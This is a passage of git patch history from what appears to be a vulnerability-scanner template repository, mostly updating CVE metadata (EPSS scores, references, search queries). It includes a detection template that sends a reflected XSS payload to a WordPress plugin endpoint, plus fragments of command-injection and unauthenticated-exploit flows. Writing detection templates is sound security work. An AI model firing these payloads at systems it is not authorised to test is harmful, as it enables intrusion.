cve,cve2024,wp,wordpress,unauth,lfi - variables: randomstr: "{{randstr_1}}" marker: "{{base64(randomstr)}}" diff --git a/http/cves/2024/CVE-2024-31848.yaml b/http/cves/2024/CVE-2024-31848.yaml index f7a29f8442..63cc3fa62d 100644 --- a/http/cves/2024/CVE-2024-31848.yaml +++ b/http/cves/2024/CVE-2024-31848.yaml @@ -11,19 +11,19 @@ info: - https://github.com/Stuub/CVE-2024-31848-PoC/blob/main/CVE-2024-31848.py - https://www.tenable.com/cve/CVE-2024-31848 - https://www.tenable.com/security/research/tra-2024-09 + - https://github.com/Stuub/CVE-2024-31848-PoC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-31848 cwe-id: CWE-22 - epss-score: 0.00044 - epss-percentile: 0.09773 + epss-score: 0.00054 + epss-percentile: 0.21518 metadata: verified: true max-request: 1 shodan-query: title:"CData - API Server" tags: cve,cve2024,cdata,lfi - flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-31849.yaml b/http/cves/2024/CVE-2024-31849.yaml index 5d341c440a..3879c0511b 100644 --- a/http/cves/2024/CVE-2024-31849.yaml +++ b/http/cves/2024/CVE-2024-31849.yaml @@ -10,19 +10,20 @@ info: - https://www.tenable.com/security/research/tra-2024-09 - https://www.cdata.com/kb/entries/jetty-cve-0324.rst - https://nvd.nist.gov/vuln/detail/CVE-2024-31849 + - https://github.com/Ostorlab/KEV + - https://github.com/Stuub/CVE-2024-31848-PoC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-31849 cwe-id: CWE-22 - epss-score: 0.00044 - epss-percentile: 0.09652 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: verified: true max-request: 1 shodan-query: title:"CData Connect" tags: cve,cve2024,cdata,lfi - flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-31850.yaml b/http/cves/2024/CVE-2024-31850.yaml index dee808c0be..9b18e3423e 100644 --- a/http/cves/2024/CVE-2024-31850.yaml +++ b/http/cves/2024/CVE-2024-31850.yaml @@ -9,19 +9,19 @@ info: reference: - https://www.tenable.com/security/research/tra-2024-09 - https://nvd.nist.gov/vuln/detail/CVE-2024-31850 + - https://github.com/Stuub/CVE-2024-31848-PoC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L cvss-score: 8.6 cve-id: CVE-2024-31850 cwe-id: CWE-22 - epss-score: 0.00044 - epss-percentile: 0.09773 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: verified: true max-request: 1 shodan-query: title:"CData Arc" tags: cve,cve2024,cdata,lfi - flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml index bdfa872f02..0eb5208772 100644 --- a/http/cves/2024/CVE-2024-32399.yaml +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -13,8 +13,8 @@ info: - https://github.com/NN0b0dy/CVE-2024-32399 - https://github.com/nomi-sec/PoC-in-GitHub classification: - epss-score: 0.00043 - epss-percentile: 0.08167 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-3273.yaml b/http/cves/2024/CVE-2024-3273.yaml index eb7b78365f..1b1d0864ab 100644 --- a/http/cves/2024/CVE-2024-3273.yaml +++ b/http/cves/2024/CVE-2024-3273.yaml @@ -2,7 +2,7 @@ id: CVE-2024-3273 info: name: D-Link Network Attached Storage - Command Injection and Backdoor Account author: pussycat0x - severity: high + severity: critical description: | UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. reference: @@ -12,17 +12,19 @@ info: - https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383 - https://vuldb.com/?ctiid.259284 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L - cvss-score: 7.3 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2024-3273 cwe-id: CWE-77 - epss-score: 0.00044 - epss-percentile: 0.09057 + epss-score: 0.83361 + epss-percentile: 0.98438 + cpe: cpe:2.3:o:dlink:dns-320l_firmware:-:*:*:*:*:*:*:* metadata: verified: true + vendor: dlink + product: dns-320l_firmware fofa-query: app="D_Link-DNS-ShareCenter" tags: cve,cve2024,dlink,nas,kev - variables: cmd: "id" diff --git a/http/cves/2024/CVE-2024-33575.yaml b/http/cves/2024/CVE-2024-33575.yaml index df83db4763..dc989fce6e 100644 --- a/http/cves/2024/CVE-2024-33575.yaml +++ b/http/cves/2024/CVE-2024-33575.yaml @@ -16,13 +16,15 @@ info: cvss-score: 5.3 cve-id: CVE-2024-33575 cwe-id: CWE-200 - epss-score: 0.00043 - epss-percentile: 0.08268 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: vendor: User Meta product: User Meta framework: wordpress publicwww-query: "/wp-content/plugins/user-meta/" + shodan-query: http.html:/wp-content/plugins/user-meta/ + fofa-query: body=/wp-content/plugins/user-meta/ tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak http: diff --git a/http/cves/2024/CVE-2024-33724.yaml b/http/cves/2024/CVE-2024-33724.yaml index 65df9f2f55..ae77343cca 100644 --- a/http/cves/2024/CVE-2024-33724.yaml +++ b/http/cves/2024/CVE-2024-33724.yaml @@ -15,6 +15,7 @@ info: vendor: soplanning product: soplanning shodan-query: html:"soplanning" + fofa-query: body="soplanning" tags: packetstorm,cve,cve2024,authenticated,soplanning,xss http: diff --git a/http/cves/2024/CVE-2024-3400.yaml b/http/cves/2024/CVE-2024-3400.yaml index 9aa9ce94e7..4582984158 100644 --- a/http/cves/2024/CVE-2024-3400.yaml +++ b/http/cves/2024/CVE-2024-3400.yaml @@ -10,22 +10,24 @@ info: - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/ - https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis - https://nvd.nist.gov/vuln/detail/CVE-2024-3400 + - https://github.com/zam89/CVE-2024-3400-pot + - https://github.com/ZephrFish/CVE-2024-3400-Canary classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2024-3400 - cwe-id: CWE-77 - epss-score: 0.00371 - epss-percentile: 0.72356 - cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:* + cwe-id: CWE-20,CWE-77 + epss-score: 0.95703 + epss-percentile: 0.99417 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:-:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: icon_hash="-631559155" - shodan-query: http.favicon.hash:-631559155 - product: pan-os vendor: paloaltonetworks - tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev + product: pan-os + shodan-query: http.favicon.hash:-631559155 + fofa-query: icon_hash="-631559155" + tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev,intrusive http: - raw: diff --git a/http/cves/2024/CVE-2024-4040.yaml b/http/cves/2024/CVE-2024-4040.yaml index 3830add6ba..f1cc825297 100644 --- a/http/cves/2024/CVE-2024-4040.yaml +++ b/http/cves/2024/CVE-2024-4040.yaml @@ -29,8 +29,8 @@ info: vendor: crushftp product: crushftp shodan-query: html:"CrushFTP" + fofa-query: body="crushftp" tags: cve,cve2024,lfr,crushftp,vfs,kev - flow: | if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) { // if username or password is not provided, run unauthenticated exploit diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml index 58c0113dd0..3db7899504 100644 --- a/http/cves/2024/CVE-2024-4348.yaml +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -9,11 +9,16 @@ info: reference: - https://packetstormsecurity.com/files/178375/osCommerce-4-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2024-4348 + - https://vuldb.com/?ctiid.262488 + - https://vuldb.com/?id.262488 + - https://vuldb.com/?submit.320855 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N cvss-score: 4.3 cve-id: CVE-2024-4348 cwe-id: CWE-79 + epss-score: 0.00065 + epss-percentile: 0.28259 metadata: verified: true max-request: 2 From e76f6aa44f9a716e5e5ae05806f0b7aa476abad0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 1 Jun 2024 11:29:10 +0530 Subject: [PATCH 1624/1768] updated format, matchers and template path --- CVE-2024-3822.yaml | 27 ------------------------ http/cves/2024/CVE-2024-3822.yaml | 34 +++++++++++++++++++++++++++++++ 2 files changed, 34 insertions(+), 27 deletions(-) delete mode 100644 CVE-2024-3822.yaml create mode 100644 http/cves/2024/CVE-2024-3822.yaml diff --git a/CVE-2024-3822.yaml b/CVE-2024-3822.yaml deleted file mode 100644 index 16f028eca3..0000000000 --- a/CVE-2024-3822.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2024-3822 - -info: - name: Base64 Encoder/Decoder <= 0.9.2 - Reflected XSS - author: omranisecurity - severity: medium - description: | - - The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. - reference: | - - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3822/ - metadata: - fofa-query: "wp-content/plugins/base64-encoderdecoder/" - max-request: 3 - tags: cve,wordpress,plugin,xss - -http: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(body, "")' - condition: and \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3822.yaml b/http/cves/2024/CVE-2024-3822.yaml new file mode 100644 index 0000000000..efebda38db --- /dev/null +++ b/http/cves/2024/CVE-2024-3822.yaml @@ -0,0 +1,34 @@ +id: CVE-2024-3822 + +info: + name: Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting + author: omranisecurity + severity: medium + description: | + The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + reference: | + - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-3822 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-3822 + cwe-id: CWE-79 + metadata: + max-request: 1 + verified: true + fofa-query: "wp-content/plugins/base64-encoderdecoder/" + tags: cve,cve2024,wordpress,wp-plugin,wp,xss,base64-encoderdecoder + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/html")' + - 'contains(body, "

")' + condition: and From 9b8dfe29b0b9e48666f9f763485dc95df634a4a8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jun 2024 06:01:56 +0000 Subject: [PATCH 1625/1768] Auto Generated Templates Checksum [Sat Jun 1 06:01:56 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 087ffde753..ea3b3872ff 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6784,7 +6784,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:88d64768349b41aa6efe98a6d64285ff73ba054e +http/technologies/favicon-detect.yaml:787a91503baf3ab099ccfb767208719227d9953c http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/gabia-server-detect.yaml:194d560530bd2f19ab14523319f46dd7ef3757d8 @@ -8384,7 +8384,7 @@ javascript/cves/2020/CVE-2020-7247.yaml:60f4be8c576cc07ffa7b843ff99a5678b096df0b javascript/cves/2023/CVE-2023-34039.yaml:af0340b7a937d8e4583b64c5e500566328c6ae51 javascript/cves/2023/CVE-2023-46604.yaml:ded5a8bcb92125c053b218e259931104983bd625 javascript/cves/2023/CVE-2023-48795.yaml:cb420dbeb5e653c4a7c056fa2c95d53dd347d29b -javascript/cves/2024/CVE-2024-23897.yaml:fcd41e7a0767d210fc075e34cd1775b4f2a39625 +javascript/cves/2024/CVE-2024-23897.yaml:367d94de33e51bd1edb3b5d350b6287fd1d95dc3 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab80779c6f41d8b7f @@ -8612,7 +8612,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:aaafa43ba87bc0f6c826b47c6238ecbfea75be99 +templates-checksum.txt:880f5ed1cba67947c180f6c9ccd0dce34c3a7664 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3dc88dc1fbcb153bec666352cd384b630f6cbf51 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 1 Jun 2024 11:32:34 +0530 Subject: [PATCH 1627/1768] Update easy-wi-installer.yaml --- http/misconfiguration/installer/easy-wi-installer.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/http/misconfiguration/installer/easy-wi-installer.yaml b/http/misconfiguration/installer/easy-wi-installer.yaml index 4f4691b875..6cebed2f58 100644 --- a/http/misconfiguration/installer/easy-wi-installer.yaml +++ b/http/misconfiguration/installer/easy-wi-installer.yaml @@ -24,11 +24,6 @@ http: words: - "Welcome to the Easy-WI installer!" - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 24cb459f5f53be8009561d576116ef8024801c33 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jun 2024 06:03:58 +0000 Subject: [PATCH 1628/1768] Auto Template Signing [Sat Jun 1 06:03:58 UTC 2024] :robot: --- http/technologies/favicon-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 813739a59c..1084b423c3 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3760,4 +3760,4 @@ http: - type: dsl dsl: - 'mmh3(base64_py(body))' -# digest: 4a0a00473045022100afa60b596fe20299d482f935df87359f0c8fb824c709cb56ef1f08634909a2000220316c27df890a1e6cb71ae4fe147ccd2465493542520ed705054c5a8df06cc1ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a2a418d1798a07774487359ddbdc2b6befe4a4ad186f241f08a56404d37df790220322ca8fdab4f82fabdddefaf154e22cc7e895577e6bd594f55b8d32ba215116e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c74b7fae9f86d4f72f5ddbf35ee3eebf00eb6c1f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 1 Jun 2024 06:17:28 +0000 Subject: [PATCH 1629/1768] Auto Generated New Template Addition List [Sat Jun 1 06:17:28 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c290ee6664..af7c0e323e 100644 --- a/.new-additions +++ b/.new-additions @@ -25,6 +25,7 @@ http/misconfiguration/installer/call-com-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml http/misconfiguration/installer/confluence-installer.yaml http/misconfiguration/installer/cubebackup-setup-installer.yaml +http/misconfiguration/installer/easy-wi-installer.yaml http/misconfiguration/installer/ejbca-enterprise-installer.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml From 61f2bb58130efbc46da8417d183c69c22f91255a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jun 2024 06:17:39 +0000 Subject: [PATCH 1630/1768] Auto Generated Templates Checksum [Sat Jun 1 06:17:39 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ea3b3872ff..9ee1bd50ce 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5433,6 +5433,7 @@ http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817 http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 http/misconfiguration/installer/easy-viserlabs-installer.yaml:7ddea4c605e0c2129861c43f62aa0988f8883b51 +http/misconfiguration/installer/easy-wi-installer.yaml:14eb6844fda91c30995bfa4594c861c3c4954615 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/ejbca-enterprise-installer.yaml:b44ca7bfe9568e4ff18fc5557d3363de848f5a67 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 @@ -6784,7 +6785,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:787a91503baf3ab099ccfb767208719227d9953c +http/technologies/favicon-detect.yaml:c4e7bbeee04fbae29183ae8edd2978a693c039d1 http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/gabia-server-detect.yaml:194d560530bd2f19ab14523319f46dd7ef3757d8 @@ -8612,7 +8613,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:880f5ed1cba67947c180f6c9ccd0dce34c3a7664 +templates-checksum.txt:485baac77da1c1ca6850dc44971b8028a6501e4d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4f5f3104d1563b85728a3992eb74bff875ffd4b4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 1 Jun 2024 06:18:18 +0000 Subject: [PATCH 1631/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index df3c596f3e..3ba1725dc3 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -30,6 +30,7 @@ on: - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - 'http/misconfiguration/installer/confluence-installer.yaml' - 'http/misconfiguration/installer/cubebackup-setup-installer.yaml' + - 'http/misconfiguration/installer/easy-wi-installer.yaml' - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' From 7490d98a1bc324d6794bd8987b939820e7db6eb3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jun 2024 06:19:22 +0000 Subject: [PATCH 1632/1768] Auto Template Signing [Sat Jun 1 06:19:22 UTC 2024] :robot: --- http/misconfiguration/installer/easy-wi-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/easy-wi-installer.yaml b/http/misconfiguration/installer/easy-wi-installer.yaml index 6cebed2f58..f2b8147926 100644 --- a/http/misconfiguration/installer/easy-wi-installer.yaml +++ b/http/misconfiguration/installer/easy-wi-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502204d9aa6d1fbedf0c798369d9b66b0952afe742fa84fd23eb0d00243e08cb1b5ee0221008f704164e63b797e8c7457041c6b5e8d3b72cdac219b90538f90c26a2c7a5528:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c7c77fdcc2af0f0a5ebf9abd1428ac6709a5c6d8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 1 Jun 2024 11:49:40 +0530 Subject: [PATCH 1633/1768] minor update --- http/cves/2024/CVE-2024-3822.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-3822.yaml b/http/cves/2024/CVE-2024-3822.yaml index efebda38db..d3f41720ba 100644 --- a/http/cves/2024/CVE-2024-3822.yaml +++ b/http/cves/2024/CVE-2024-3822.yaml @@ -6,29 +6,32 @@ info: severity: medium description: | The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. - reference: | + reference: |- - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ - https://nvd.nist.gov/vuln/detail/CVE-2024-3822 + - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2024-3822 cwe-id: CWE-79 + epss-score: 0.00043 + epss-percentile: 0.0866 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: "wp-content/plugins/base64-encoderdecoder/" tags: cve,cve2024,wordpress,wp-plugin,wp,xss,base64-encoderdecoder http: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" + - "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgiZG9jdW1lbnQuZG9tYWluIik8L3NjcmlwdD4=" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(header, "text/html")' - - 'contains(body, "

")' + - 'contains(body, "

")' condition: and From 73e54615383e26fcb8ffd7b35ba4ac4d4097f109 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 1 Jun 2024 11:51:52 +0530 Subject: [PATCH 1634/1768] fix template --- http/cves/2024/CVE-2024-3822.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-3822.yaml b/http/cves/2024/CVE-2024-3822.yaml index d3f41720ba..e70a26f13c 100644 --- a/http/cves/2024/CVE-2024-3822.yaml +++ b/http/cves/2024/CVE-2024-3822.yaml @@ -6,7 +6,7 @@ info: severity: medium description: | The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. - reference: |- + reference: | - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ - https://nvd.nist.gov/vuln/detail/CVE-2024-3822 - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ @@ -33,5 +33,5 @@ http: dsl: - 'status_code == 200' - 'contains(header, "text/html")' - - 'contains(body, "

")' + - 'contains(body, "

")' condition: and From e76853e9466b8bb891142898d49de14eb41919a7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 1 Jun 2024 06:24:35 +0000 Subject: [PATCH 1635/1768] Auto Generated New Template Addition List [Sat Jun 1 06:24:35 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index af7c0e323e..634104ea53 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ http/cves/2024/CVE-2024-21683.yaml http/cves/2024/CVE-2024-24919.yaml http/cves/2024/CVE-2024-34470.yaml http/cves/2024/CVE-2024-3495.yaml +http/cves/2024/CVE-2024-3822.yaml http/cves/2024/CVE-2024-5230.yaml http/default-logins/ampjuke-default-login.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml From c408cd025db7d1fb6f5560b0fae340bb43465410 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jun 2024 06:24:39 +0000 Subject: [PATCH 1636/1768] Auto Generated Templates Checksum [Sat Jun 1 06:24:39 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9ee1bd50ce..92f757c619 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3311,6 +3311,7 @@ http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-34470.yaml:a5518a2ed26dd99303e2e20f7356eece7f2dc927 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 +http/cves/2024/CVE-2024-3822.yaml:e70a67d151ade654abc8ca4a6bc9d296073d6123 http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b http/cves/2024/CVE-2024-4956.yaml:a00f92400517494320ec968d237c98bb1056de25 @@ -5433,7 +5434,7 @@ http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817 http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 http/misconfiguration/installer/easy-viserlabs-installer.yaml:7ddea4c605e0c2129861c43f62aa0988f8883b51 -http/misconfiguration/installer/easy-wi-installer.yaml:14eb6844fda91c30995bfa4594c861c3c4954615 +http/misconfiguration/installer/easy-wi-installer.yaml:4d27fe3eb5f34b9a75dd2ca7f4213b7e400ba104 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/ejbca-enterprise-installer.yaml:b44ca7bfe9568e4ff18fc5557d3363de848f5a67 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 @@ -8613,7 +8614,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:485baac77da1c1ca6850dc44971b8028a6501e4d +templates-checksum.txt:7699d41e3854e2471b4942f0947e77c3fb0259ea wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 